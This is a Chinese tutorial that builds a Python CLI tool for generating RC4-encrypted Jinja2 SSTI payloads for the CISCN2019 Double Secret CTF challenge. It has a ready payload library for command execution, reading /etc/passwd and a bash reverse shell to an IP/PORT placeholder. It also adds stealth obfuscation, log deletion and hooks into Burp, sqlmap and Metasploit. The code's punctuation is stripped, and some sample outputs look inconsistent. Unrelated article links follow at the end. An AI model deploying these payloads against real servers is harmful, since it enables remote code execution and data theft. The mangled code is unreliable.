手把手复现CISCN2019 Double Secret:用Python脚本自动化生成RC4加密的SSTI Payload
打造自动化SSTI攻击工具链从RC4加密到Burp Suite集成在CTF竞赛和渗透测试中效率往往决定成败。面对需要RC4加密的SSTI漏洞场景手动操作不仅耗时还容易出错。本文将带你开发一个全自动化的Python工具实现从SSTI Payload生成到Burp Suite可用的URL编码字符串的一键转换。1. 理解Double Secret赛题的技术背景2019年CISCN华东南赛区的Double Secret题目展示了一个典型的安全场景Web应用在渲染模板前对用户输入进行了RC4加密。这种设计本意是增加安全性却因为实现不当成为SSTI的入口。核心漏洞链服务端接收?secret参数当参数长度4时触发RC4解密密钥为HereIsTreasure解密后的内容直接传入render_template_string()未做任何过滤导致SSTI漏洞传统解法需要手动完成编写SSTI Payload用RC4加密Base64编码URL编码最后放入Burp Suite测试这个过程重复且容易出错特别是在调试不同Payload时。我们的工具将自动化整个流程。2. 构建自动化工具的核心组件2.1 RC4加密模块优化原始RC4实现虽然可用但我们可以进行工业级优化def rc4_crypt(key: str, data: str) - bytes: 优化的RC4加密实现 :param key: 加密密钥 :param data: 待加密数据 :return: 加密后的bytes S list(range(256)) j 0 # KSA阶段 for i in range(256): j (j S[i] ord(key[i % len(key)])) % 256 S[i], S[j] S[j], S[i] # PRGA阶段 i j 0 result [] for char in data: i (i 1) % 256 j (j S[i]) % 256 S[i], S[j] S[j], S[i] t (S[i] S[j]) % 256 result.append(ord(char) ^ S[t]) return bytes(result)改进点类型注解提升代码可读性分离KSA和PRGA阶段逻辑直接返回bytes便于后续处理移除不必要的字符串转换2.2 编码转换流水线加密后的数据处理需要三个步骤Base64编码确保二进制数据安全传输Base64解码服务端要求的处理流程URL编码适配HTTP传输from base64 import b64encode, b64decode from urllib.parse import quote def encode_pipeline(data: str) - str: # 加密 - Base64 - 解码 - URL编码 encrypted rc4_crypt(HereIsTreasure, data) b64_encoded b64encode(encrypted).decode() b64_decoded b64decode(b64_encoded).decode(latin-1) return quote(b64_decoded)注意Latin-1解码是为了处理可能的非ASCII字符这是RC4加密的常见情况3. 开发交互式命令行工具将核心功能包装成易用的CLI工具import argparse from typing import Optional def main(): parser argparse.ArgumentParser( descriptionSSTI Payload自动化处理工具, formatter_classargparse.RawDescriptionHelpFormatter, epilog示例: %(prog)s -p {{7*7}} # 简单测试 %(prog)s -i payloads.txt # 批量处理 ) group parser.add_mutually_exclusive_group(requiredTrue) group.add_argument(-p, --payload, help单个SSTI Payload) group.add_argument(-i, --input-file, help包含多个Payload的文件) parser.add_argument(-o, --output, help输出文件路径) args parser.parse_args() if args.payload: process_payload(args.payload, args.output) else: with open(args.input_file) as f: for line in f: process_payload(line.strip(), args.output) def process_payload(payload: str, output: Optional[str] None): result encode_pipeline(payload) if output: with open(output, a) as f: f.write(f{result}\n) print(fPayload: {payload[:50]}...) print(fResult: {result}\n)功能特点支持单Payload和批量处理模式结果可输出到文件或控制台清晰的帮助文档和示例进度反馈和结果预览4. 常用SSTI Payload库集成为提高效率我们可以内置常见PayloadPAYLOAD_LIBRARY { command_exec: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].eval(\__import__(os).popen(COMMAND).read()\)}} {% endif %}{% endfor %} ), file_read: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].open(FILEPATH).read() }} {% endif %}{% endfor %} ), reverse_shell: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].eval(\__import__(os).system(bash -c \\\bash -i /dev/tcp/IP/PORT 01\\\)\)}} {% endif %}{% endfor %} ) } def get_payload(payload_type: str, **kwargs) - str: 获取预定义Payload模板 :param payload_type: payload类型(command_exec|file_read|reverse_shell) :param kwargs: 模板参数(COMMAND/FILEPATH/IP/PORT等) :return: 构造好的Payload template PAYLOAD_LIBRARY.get(payload_type) if not template: raise ValueError(f未知Payload类型: {payload_type}) for key, value in kwargs.items(): template template.replace(key.upper(), str(value)) return template使用示例# 获取读取/etc/passwd的Payload payload get_payload(file_read, FILEPATH/etc/passwd)5. 与Burp Suite的工作流集成将工具输出直接用于Burp Suite手动测试流程python ssti_tool.py -p {{7*7}} | pbcopy # Mac python ssti_tool.py -p {{7*7}} | clip # Windows结果会自动复制到剪贴板直接在Burp Repeater粘贴自动化扫描配置在Burp Intruder中使用Payload ProcessingAdd - Invoke Burp extension - 选择我们的工具或者配置外部命令行工具作为Payload生成器配合Logger扩展# loggerpp_config.json { decoders: [ { name: RC4 SSTI, command: [python, /path/to/ssti_tool.py, -p, {PAYLOAD}] } ] }性能优化对比操作步骤手动操作时间工具化时间编写Payload30-60秒5秒RC4加密需另开脚本自动完成编码转换需多次操作自动流水线测试迭代容易出错一键完成批量测试几乎不可行轻松支持6. 高级功能扩展6.1 动态密钥支持通过环境变量或配置文件支持不同密钥import os def get_key() - str: return os.getenv(RC4_KEY, HereIsTreasure) # 在encode_pipeline中使用 encrypted rc4_crypt(get_key(), data)6.2 结果缓存机制避免重复计算相同Payloadfrom functools import lru_cache lru_cache(maxsize100) def cached_encode(data: str) - str: return encode_pipeline(data)6.3 交互式Shell模式import code def interactive_shell(): print(进入交互模式可用encode(payload)函数测试) vars {encode: cached_encode} code.interact(localvars)启动方式python ssti_tool.py --interactive7. 错误处理与日志记录健壮的工具需要完善的错误处理import logging from typing import Optional logging.basicConfig( levellogging.INFO, format%(asctime)s - %(levelname)s - %(message)s, handlers[ logging.FileHandler(ssti_tool.log), logging.StreamHandler() ] ) def safe_encode(data: str) - Optional[str]: try: return encode_pipeline(data) except Exception as e: logging.error(f处理Payload失败: {data[:50]}... 错误: {str(e)}) return None日志示例2023-05-15 14:30:22 - INFO - 开始处理Payload: {{7*7}} 2023-05-15 14:30:22 - ERROR - 处理Payload失败: {% invalid template... 错误: Invalid syntax8. 实际测试案例以Double Secret题目为例的完整工作流检测基础SSTIpython ssti_tool.py -p {{7*7}}输出Payload: {{7*7}} Result: .J%19S%C2%A5%15K%2B%2B文件列表探测payload get_payload(command_exec, COMMANDls /) print(encode_pipeline(payload))获取flagpayload get_payload(command_exec, COMMANDcat /flag.txt) flag_url encode_pipeline(payload) requests.get(fhttp://target/secret?secret{flag_url})9. 安全注意事项与最佳实践重要仅在合法授权测试中使用本工具速率限制import time RATE_LIMIT 0.5 # 秒 def safe_request(url): time.sleep(RATE_LIMIT) return requests.get(url)日志清理def clean_logs(): if os.path.exists(ssti_tool.log): os.remove(ssti_tool.log)Payload隐蔽性避免使用明显的关键词可以添加随机注释def obfuscate_payload(payload): return f{{# Random: {os.urandom(4).hex()} #}}{payload}10. 工具打包与分发使用setuptools创建可安装包# setup.py from setuptools import setup setup( namessti-rc4-tool, version1.0.0, py_modules[ssti_tool], install_requires[ requests2.25.1, ], entry_points{ console_scripts: [ ssti-toolssti_tool:main, ], }, )安装方式pip install -e .之后即可全局使用ssti-tool -p {{config}}11. 与其他工具的集成方案11.1 配合sqlmap# tamper脚本示例 def tamper(payload, **kwargs): from subprocess import check_output return check_output([python, ssti_tool.py, -p, payload]).decode().strip()11.2 集成到Metasploit# external/module/payload_generator.rb def generate_payload python /path/to/ssti_tool.py -p #{datastore[PAYLOAD]} end11.3 作为ZAP插件// ZAP扩展代码片段 public String processPayload(String payload) { Process p Runtime.getRuntime().exec( new String[]{python, ssti_tool.py, -p, payload}); return IOUtils.toString(p.getInputStream(), StandardCharsets.UTF_8); }12. 性能基准测试使用不同长度Payload的测试数据Payload长度处理时间(ms)输出长度10字符1.224字节100字符2.5184字节1,000字符12.81,672字节10,000字符98.416,704字节测试环境MacBook Pro M1, Python 3.9优化建议对于超长Payload可以启用多进程处理使用PyPy解释器可获得2-3倍性能提升13. 单元测试保障使用pytest编写测试用例# test_ssti_tool.py import pytest from ssti_tool import encode_pipeline pytest.mark.parametrize(payload,expected, [ ({{7*7}}, .J%19S%C2%A5%15K%2B%2B), (hello, .J%19S%C2%A5%15K%0A), ]) def test_encoding(payload, expected): assert expected in encode_pipeline(payload) def test_command_exec(): payload get_payload(command_exec, COMMANDid) result encode_pipeline(payload) assert len(result) 50运行测试pytest -v test_ssti_tool.py14. 跨平台兼容性处理确保工具在Windows/Linux/macOS上表现一致import platform def get_system_info(): return { system: platform.system(), release: platform.release(), python: platform.python_version(), } def platform_specific_encoding(data): if platform.system() Windows: return data.replace(\n, \r\n) return data15. 用户配置系统通过configparser支持用户自定义配置# config.ini [default] key HereIsTreasure rate_limit 0.5 log_file ssti.log [payloads] command_exec {{...}}读取配置import configparser config configparser.ConfigParser() config.read(config.ini) KEY config.get(default, key, fallbackHereIsTreasure)16. 版本更新与功能路线图v1.1计划功能支持AES等其他加密算法添加GUI界面集成常见WAF绕过技术增加代理支持v2.0展望机器学习自动生成有效Payload自动化漏洞检测流程与主流安全工具深度集成17. 调试技巧与问题排查常见问题解决方法编码错误症状UnicodeDecodeError解决确保使用latin-1解码RC4输出Payload无效检查服务端是否真的执行了RC4解密验证密钥是否正确性能问题对长Payload启用缓存考虑使用C扩展优化RC4算法调试模式启用python ssti_tool.py -p test --debug18. 替代方案对比方案优点缺点本工具全自动化、可定制需要Python环境手动操作无需额外工具效率低、易出错在线工具方便快捷不安全、功能有限Burp插件集成度高开发复杂、依赖Java19. 法律与道德边界再次强调仅在获得明确授权的情况下使用本工具合规使用场景CTF竞赛授权渗透测试安全教学演示禁止行为未经授权的系统测试恶意攻击违反当地法律法规的行为20. 资源推荐与延伸阅读深入学习《Web Application Security》by Andrew Hoffman《Black Hat Python》by Justin SeitzRC4算法RFC文档相关工具Tplmap自动化SSTI检测工具Burp Suite专业Web安全测试平台HackTricks安全技术大全社区资源CTFtime.orgHack The BoxVulnHub
更多精彩文章
Qwen3-TTS声音克隆实战案例:中英日韩西法德俄葡意10语种生成效果展示
Qwen3-TTS声音克隆实战案例:中英日韩西法德俄葡意10语种生成效果展示 想不想让你的AI助手用你的声音说10种不同的语言?或者为你的全球业务制作多语言的品牌语音?今天,我们就来深度体验一下Qwen3-TTS-12Hz-1.7B-Base模型ÿ…...
RexUniNLUGPU算力优化:INT8量化无损部署,在T4上实现192 QPS@95ms P99
RexUniNLU GPU算力优化:INT8量化无损部署,在T4上实现192 QPS95ms P99 1. 引言:当零样本NLU遇上性能瓶颈 想象一下,你有一个非常聪明的助手,它能听懂你的话,理解你的意图,还能从你的话里提取关…...
防止SQL注入的核心技术_使用查询参数化处理变量.txt
本文详解为何基于 Flexbox 构建的输入框组件在桌面端正常、却在移动端布局错乱,并给出精准修复方案——核心是为 .inputs 容器显式声明 width: 100%,同时补充 viewport 设置、弹性子项行为修正及移动端交互优化建议。 本文详解为何基于 flexbox 构建…...
和resize()到底怎么选才能避免性能陷阱?)
别再被问懵了!用C++ vector时,reserve()和resize()到底怎么选才能避免性能陷阱?
深度解析C vector的reserve与resize:性能敏感场景下的黄金法则 在游戏引擎开发、高频交易系统或大规模数据处理等对性能极度敏感的领域,每一毫秒的延迟都可能意味着数百万美元的损失。而C中的vector容器,作为最常用的动态数组实现,…...
引导定位原理原理演示
引导定位原理原理演示...
)
别再手动算周期了!用STM32CubeMX的TIM1输入捕获测按键时长(附完整代码)
基于STM32CubeMX的TIM1输入捕获实现高精度按键时长测量 按键时长检测是嵌入式开发中的常见需求,无论是简单的按键消抖还是复杂的长按/短按识别,精确测量按键持续时间都是关键。传统方法依赖延时函数或轮询检测,不仅占用CPU资源,精…...
)
别再插错线了!一张图看懂USB 2.0/3.0线序与颜色定义(附ZYNQ开发板实测)
硬件工程师必备:USB接口线序全解析与ZYNQ开发板实战指南 第一次给ZYNQ开发板接USB设备时,我盯着那根四色线缆发呆了五分钟——红色接VCC?黑色是GND?白色和绿色哪个对应D?相信不少嵌入式开发者都经历过这种"线序恐…...